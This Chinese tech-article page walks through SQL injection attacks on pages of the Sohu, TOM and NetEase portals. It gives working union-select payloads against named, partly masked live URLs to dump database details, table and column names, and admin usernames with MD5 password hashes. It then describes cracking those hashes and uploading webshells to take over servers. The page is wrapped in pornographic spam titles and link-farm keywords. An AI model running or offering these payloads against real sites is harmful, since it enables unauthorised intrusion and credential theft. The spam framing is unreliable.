成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

對搜狐、網(wǎng)易和TOM三大門戶網(wǎng)站的SQL注入漏洞檢測

安全 應(yīng)用安全
筆者對搜狐及TOM和網(wǎng)易這三大門戶網(wǎng)站作了注入攻擊檢測,發(fā)現(xiàn)同樣存在明顯的注入漏洞,安全性很糟糕。

筆者對搜狐及TOM和網(wǎng)易這三大門戶網(wǎng)站作了注入攻擊檢測,發(fā)現(xiàn)同樣存在明顯的注入漏洞,安全性很糟糕。

1.MySQL注入檢測搜狐門戶網(wǎng)站

首先,來看看搜狐網(wǎng)站,搜狐網(wǎng)站上的動態(tài)網(wǎng)頁大部分是采用PHP語言編寫的,同樣注入也很多。例如:

http://app.sh.sohu.com/lo***l/s.php?id=636

這個網(wǎng)頁是一個歐萊雅廣告頁面,未對提交的數(shù)字參數(shù)進行檢測,可直接利用SQL注入獲得當前數(shù)據(jù)版本、庫名、用戶等信息。首先,通過Order by查詢獲得字段數(shù)目為9,然后通過union select查詢可獲得數(shù)據(jù)庫的各種信息(圖1):

http://app.sh.sohu.com/lo***l/s.php?id=636 and 1=2 union select 1,2,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9

圖1  搜狐網(wǎng)站SQL注入查詢數(shù)據(jù)庫信息

圖1  搜狐網(wǎng)站SQL注入查詢數(shù)據(jù)庫信息#p#

可得到當前數(shù)據(jù)庫用戶名為admin,數(shù)據(jù)庫服務(wù)器地址為10.10.82.159,數(shù)據(jù)庫版本為Mysql 5.0.27,當前數(shù)據(jù)庫名為sohush。

再進一步檢測,發(fā)現(xiàn)其中存在幾個非常重要的數(shù)據(jù)庫,包括:dvbbs、love008。前者是論壇數(shù)據(jù)庫,后者是2008專題數(shù)據(jù)庫。在論壇數(shù)據(jù)庫中,可猜解出管理員賬號和密碼為:jim、4591b******ee2b5。在love008數(shù)據(jù)庫中猜解出兩個管理員用戶和密碼分別為(圖2):

admin 21232f297a*****743894a0e4a801fc3

es   3e4a632cb*****8fc2386fa5f8e4bd76

圖2  猜解出管理員賬號與密碼

圖2  猜解出管理員賬號與密碼#p#

雖然說管理員密碼都是MD5加密的,不過現(xiàn)在網(wǎng)上有20G的彩虹表下載,破解這些普通密碼MD5值并不是太困難的事情。通過后臺登陸,攻擊者可以想方設(shè)法上傳WebShell并進行提權(quán)與進一步滲透入侵操作。

此外,在搜狐網(wǎng)站中還有非常多的SQL注入點,舉例如下:

注入點1(圖3):http://card.money.****.com/yh/card_product.php?id=71

注入點2:http://blog.club.****.com/list_diary_detail.php?artid=43761&db=blog002P4&kindid=3403

注入點3:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

注入點4:http://mini***.163.com/2009/0909/wuliangye/article.php?id=13

注入點5:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529

注入點6:http://people.business.****.com/person/plist.php?userid=2047

注入點7:http://minisite.it.****.com/minisite/site849/photodetail1.jsp?corpID=849&status=browse&privCode=04&pictureID=57275

注入點8:http://zj.svip.****.com/news/2010/duanxindasai/item_list.php?category_id=1905

圖3  搜狐注入點查詢數(shù)據(jù)庫信息

圖3  搜狐注入點查詢數(shù)據(jù)庫信息#p#

2.MySQL注入檢測TOM門戶網(wǎng)站

TOM也是國內(nèi)一大門戶網(wǎng)站,在對TOM門戶網(wǎng)站進行檢測的過程中,也發(fā)現(xiàn)了許多嚴重的SQL注入漏洞,而且危害性非常大,直接導致攻擊者登陸后臺上傳木馬獲得WebShell,并進一步控制整個網(wǎng)站服務(wù)器!

TOM網(wǎng)站的注入點地址為:

http://qd**.tom.com/blog_content.php?blogid=482

直接用Order by進行查詢時,會出錯并跳轉(zhuǎn)到網(wǎng)站首頁,可使用--終止符號進行隔斷處理,執(zhí)行如下查詢:

http://qd**.tom.com/blog_content.php?blogid=482 order by 14--

返回正常頁面,得到字段數(shù)為14。再執(zhí)行如下查詢(圖4):

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9,10,11,12,13,14%20--

圖4  union聯(lián)合查詢獲得數(shù)據(jù)庫相關(guān)信息

圖4  union聯(lián)合查詢獲得數(shù)據(jù)庫相關(guān)信息#p#

得到當前數(shù)據(jù)庫版本、數(shù)據(jù)庫名和用戶。再爆出當前數(shù)據(jù)庫中的所有表名,提交如下查詢:

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(table_name),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--

圖5  查詢到所有表名

圖5  查詢到所有表名

在頁面返回信息中,即可得到所有表名(圖5)。在其中有名為adminuser的表名,表中很可能包含了管理員賬號及密碼,查詢該表中的列名,可提交如下查詢:

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=(0x61646D696E75736572)--#p#

圖6  返回用戶名及密碼數(shù)據(jù)列

圖6  返回用戶名及密碼數(shù)據(jù)列

從頁面返回信息中,可以看到用戶名及密碼列為username和pw(圖6)。現(xiàn)在要爆出用戶名和密碼的數(shù)據(jù)值,提交如下查詢語句:

http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(username,0x7C,pw),5,6,7,8,9,10,11,12,13,14 from adminuser--#p#

圖7  獲得管理員賬號密碼信息

圖7  獲得管理員賬號密碼信息

從返回的頁面信息中,可看到管理員用戶名為qdjxlq,密碼為3631137b9b0e47608c4ece9decc9a607(圖7)。密碼是經(jīng)過MD5加密的32密文,破解并不是很困難。得到后臺管理員賬號密碼后,再尋找后臺登陸地址,得到后臺登陸鏈接地址為(圖8):

http://qd**.tom.com/admin/admin_login.php

圖8  管理員后臺登陸頁面

圖8  管理員后臺登陸頁面

登陸后臺獲得WebShell后,就可以進一步入侵控制服務(wù)器并進行滲透攻擊。#p#

3.MySQL注入檢測網(wǎng)易門戶網(wǎng)站

在對國內(nèi)其它門戶網(wǎng)站進行檢測時發(fā)現(xiàn),有許多網(wǎng)站也同樣存在著SQL注入漏洞,例如在網(wǎng)易中存在如下注入點鏈接地址:

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13

通過order by查詢可得到字段數(shù),再通過提交如下查詢:

http://min****e.163.com/2009/0909/wuliangye/article.php?id=13%20and%201=2%20union%20select%201,database(),user(),version(),5,6,7,8

即可得到數(shù)據(jù)庫版本、用戶名和數(shù)據(jù)庫名信息(圖9)。由于數(shù)據(jù)庫為Mysql 4.0版本,因此不能直接爆出數(shù)據(jù)表名,只有靠字典一個個進行猜解,猜解起來比較麻煩。

圖9  網(wǎng)易注入點猜解示例

圖9  網(wǎng)易注入點猜解示例

 

【編輯推薦】

  1. “SQL注入”的前世今生和防御思路
  2. 對利用Linq清除Sql注入式攻擊的深入解剖
  3. 如何斬斷SQL注入式攻擊的瘋狂魔掌?
  4. PHP+MySQL注入導出文件的新發(fā)現(xiàn)-附帶IPB2的漏洞利用

 

責任編輯:佟健 來源: 《大中型網(wǎng)絡(luò)入侵要案》
相關(guān)推薦

2011-05-11 14:43:00

門戶網(wǎng)站

2012-01-06 10:42:43

NASA開源

2016-01-26 10:41:23

SaaSSaaS應(yīng)用

2010-11-25 10:33:04

2010-08-17 13:23:49

2023-12-01 16:21:42

2011-05-11 14:34:13

門戶網(wǎng)站

2011-12-13 10:06:11

2011-05-11 14:12:39

門戶網(wǎng)站

2017-02-10 12:01:07

2010-05-04 16:40:14

Oracle加速計劃

2011-01-21 18:13:41

RadwareAlteon應(yīng)用交付

2017-08-16 08:49:27

私有云自助服務(wù)

2012-05-04 10:16:51

vmware虛擬化View VDI

2010-05-27 18:26:53

2013-02-19 10:30:16

2010-08-17 14:05:48

Div+CSS

2012-11-08 17:02:58

2010-10-22 15:18:18

SQL注入漏洞
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 国产一级影片 | 国产午夜三级一区二区三 | 视频一区二区在线观看 | 国产综合精品一区二区三区 | 欧美一区二区成人 | 久久一久久 | 精品美女久久久久久免费 | 天天干免费视频 | 日本午夜精品 | 中文字幕av免费 | 一级午夜aaa免费看三区 | 欧美日韩淫片 | 久草网免费 | 国产黄色精品在线观看 | 精品欧美一区二区三区精品久久 | 久久久久国产一区二区三区四区 | 中文字幕11页 | 亚洲网站在线观看 | 中文字幕精品一区二区三区精品 | 中文字幕 在线观看 | 手机在线一区二区三区 | 国产高清美女一级a毛片久久w | 国产亚洲精品久久午夜玫瑰园 | 91高清视频在线 | 久久av一区二区三区 | 国产欧美在线播放 | 日韩在线视频一区二区三区 | 激情久久av一区av二区av三区 | 在线成人 | 久久丁香 | 亚洲精品专区 | 性一爱一乱一交一视频 | a在线视频 | 欧美一级免费看 | 免费a网站 | 日韩在线免费播放 | 国产精品视频在线播放 | 人人草天天草 | 狠狠操狠狠干 | 久久99精品久久久 | 日韩一区二区三区视频 |